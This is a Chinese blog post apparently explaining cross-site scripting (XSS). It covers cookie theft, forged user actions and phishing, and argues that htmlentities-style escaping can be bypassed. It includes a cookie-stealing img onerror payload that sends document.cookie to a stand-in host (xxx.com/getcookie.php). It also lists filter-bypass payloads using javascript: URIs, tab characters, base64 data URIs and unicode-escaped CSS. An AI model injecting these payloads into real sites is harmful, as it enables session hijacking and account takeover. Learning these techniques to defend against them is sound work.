`
pcajax
  • 浏览: 2157182 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

无处不在的xss攻击

阅读更多

XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的HTML代码会被执行,从而达到攻击的特殊目的。

常见的有:

  • 盗取cookie。
    最简单的比如提交一个图片"<img src="x" onerror="window.open(http://xxx.com/getcookie.php?c='+document.cookie)" />"。假如session没有ip绑定的话,在盗取cookie后,还可以伪造cookie,进行session欺骗。
  • 模拟用户操作。
    只要事先查看了服务器接口的格式,就可以伪造各种数据,当用户浏览页面时,自动以该用户的名义将数据提交到服务器。比如服务器有一个接口叫changeInfo,参数是info,我们只要将一段post代码放到img的onerror里面,这样每个浏览网页的用户的信息都修改成了你想要的。
  • 钓鱼攻击。
    在注入的代码中,重写本页内容或弹出对话框,要求用户输入诸如用户密码之类的信息。

其核心点在于注入,就是通过各种不同的方式,通过对网站提交一些特殊的数据,或者网站页面中本身就故意包含一些代码,使得页面能自动执行一些我们预想的操作或者屏蔽掉一些页面本身的内容。

我们为了防止执行用户直接在某些输入字段里直接提交'<script>alert(1)</script>'或'xxx-->'及'<!--xxx'这样的代码,在服务器端一般都会用htmlentities之类的转义函数来避免执行。但仅仅这是不够的,因为这仅仅处理了html转义的问题,仅避免了'<script>'这一类的注入方式,可以通过多种手段绕过,如:

  • <img src="x" onerror="alert('ah ha!')" />
  • <meta http-equiv="refresh" content="0;url=javascript:alert('ah ha ha!');">
  • <img src="javascript:alert('ah ha ha ha!');">
  • <font style='color:expression(alert('ah ha ha ha ha!'))'>

以上的写法比较直白,一看就知道干坏事的,我们还可以通过一些手段进行伪装,例如引用外部js,或者利用各种转义,插入不可见字符,及一些hack手段。个人认为最隐蔽的是在css中进行注入,因为css中的一些样式是支持javascript:伪协议的,然后又支持Unicode以及base64编码,这比html中的实体转义更隐蔽,如:

  • <img src=javascript:alert('XSS')>
  • <img src="jav ascript:alert('XSS');">
    是tab制表符的转义,更简单的<img src="jav    ascript:alert('XSS');">
  • <meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  • <div style="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
分享到:
评论

相关推荐

    [KCon 2016]0828_1_朱利军_剑走偏锋之 Hacking 无处不在.pdf

    接着,朱利军探讨了哪些系统能被Hacking(What),并且列举了包括传统漏洞(如文件下载信息泄露、SQL注入、XXE注入、CSRF、SSRF、XSS攻击等)和新型漏洞(如API接口认证、业务流程弱加密、身份认证业务篡改等)。...

    APT攻击及其网络空间防护对策分析.pdf

    然而,APT攻击的复杂性和多维度性使得"短板"可能无处不在,导致防御永远滞后于攻击。因此,防护建设的核心思路应该是设计出一个缓冲带,这个缓冲带能够对威胁进行有效感知,为攻击者制造难度,延缓其攻击过程,延长...

    Web安全实践

    "Web安全实践"这一主题涵盖了多个重要的网络安全领域,包括但不限于预防SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、会话管理、访问控制、加密与认证等多个方面。下面,我们将深入探讨这些关键的安全实践...

    基于木马的网络攻击技术研究

    - **网络攻击分类**:常见的网络攻击包括拒绝服务(DoS)攻击、分布式拒绝服务(DDoS)攻击、SQL注入、跨站脚本(XSS)、缓冲区溢出等。 - **网络攻击技术的发展趋势**:随着网络安全技术的进步,网络攻击技术也在...

    网易web安全《web基础知识》

    XSS攻击是通过注入恶意脚本到用户浏览器,从而获取敏感信息或执行其他恶意操作。因此,了解和遵循HTML编码规范,避免使用不安全的HTML特性,可以有效防止此类攻击。 2. CSS(层叠样式表):CSS用于控制网页的外观和...

    not-slithering-anywhere:我们的“无处不在”易受攻击的应用程序的Python版本

    概述Not Slithering Anywhere是我们的易受攻击的应用程序的Python(3)版本。 它旨在演示Python应用程序中常见的许多安全问题,并作为静态和动态工具测试基础的基础。入门设置venv ala python3 -m venv ~/.venv/...

    Web应用安全:代理及重放习题(实验习题).docx

    Web应用安全是一个至关重要的领域,尤其是在互联网高度发达的今天,各种网络服务和应用程序无处不在。Web应用安全涉及多个方面,其中包括防止恶意攻击和保护用户数据。本篇内容主要讨论了代理和重放攻击,这两种技术...

    白帽子讲web安全 完整版

    使用Content Security Policy(CSP)可降低XSS攻击的风险;而CSRF令牌的使用则有助于防止跨站请求伪造。 4. **加密与认证**:Web安全离不开加密技术,如SSL/TLS用于确保数据在传输过程中的安全性。此外,身份验证...

    Web安全专项技术培训.rar

    然而,随着Web应用的普及,相关的安全问题也日益突出,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等,这些威胁不仅可能导致数据泄露,还可能对用户隐私和企业资产造成严重损害。 本次培训的核心内容...

    信息安全_数据安全_Yet_Another_IoT_Hack.pdf

    1. **跨站脚本(XSS)**:这是一种让攻击者在受害者浏览器上执行代码的漏洞。攻击点通常包括输入字段、URL和POST参数,可能导致凭证盗窃、钓鱼攻击和敏感数据暴露。 2. **SQL注入**:攻击者通过数据库处理的输入...

    WEB安全测试实战.rar

    Web应用在现代社会中无处不在,它们承载了大量的敏感数据,因此Web安全测试显得尤为重要。本书旨在帮助读者掌握Web安全的基本概念、威胁类型以及应对策略。 首先,Web安全测试涉及的主要目标是识别和修复可能导致...

    keong:让家无处不在

    安全性也是不可忽视的一环,可能需要应用HTTPS加密、防止XSS和CSRF攻击,以及实施严格的权限控制来保护用户数据。 最后,考虑到持续集成和持续部署(CI/CD)的重要性,Keong的开发流程可能包括了Git版本控制、自动化...

    计算机网络安全及日常防范 (2).docx

    黑客利用技术手段,如SQL注入、跨站脚本攻击(XSS)、零日攻击等,非法获取用户的个人信息,甚至控制整个网络系统。这些攻击可能导致数据泄露、服务中断,甚至影响到整个企业的运营。 为了应对这些威胁,我们需要采取...

    信息安全_数据安全_认证体制研究.pdf

    在Web安全方面,防止跨站脚本(XSS)和SQL注入等常见攻击手段至关重要;业务安全强调保护企业内部数据和流程,防止内部泄露和外部攻击;金融安全则关注支付系统的安全性,防止欺诈和资金盗窃;区块链技术以其分布式...

    AI安全 暗网治理思路 - apache.zip

    AI技术可以用于智能地识别和阻止Web攻击,如SQL注入、跨站脚本攻击(XSS)等。 至于标签中的"风险评估",在AI安全中,这意味着量化和理解可能的安全风险,以便制定有效的防御策略。解释器模式涉及到在运行时解析和...

    Haifei Li Flash安全的过去,现在,和将来

    由于Flash的开放性,恶意黑客可以利用其编程漏洞进行攻击,如零日攻击、跨站脚本攻击(XSS)等,对用户的隐私和系统安全构成严重威胁。 现在:Flash的衰落与替代品的崛起 近年来,随着HTML5、WebGL和WebAssembly等...

    php开发的服装设计服装厂商网站.zip

    PHP提供了多种安全机制,如输入验证、过滤、防止SQL注入和XSS攻击等,保护网站免受恶意攻击,确保用户数据的安全。 5. **模板引擎** 在这个项目中,可能会使用到像Smarty这样的PHP模板引擎,它将代码和设计分离,...

    imaswebimasweb

    Web应用面临的风险包括SQL注入、跨站脚本(XSS)攻击、CSRF(跨站请求伪造)等,因此,一个专门针对Web行为的监控系统可以实时检测这些攻击,提高系统的安全性。 在更深入的层面上,这样的系统可能采用了数据挖掘和...

    APPLICATION SECURITY

    3. **编码实践**:遵循安全编程规范,避免常见漏洞,如SQL注入、XSS攻击等。 4. **代码审查**:进行同行评审和自动化工具扫描,识别潜在的安全问题。 5. **安全测试**:定期进行渗透测试和安全审计,确保软件在不同...

Global site tag (gtag.js) - Google Analytics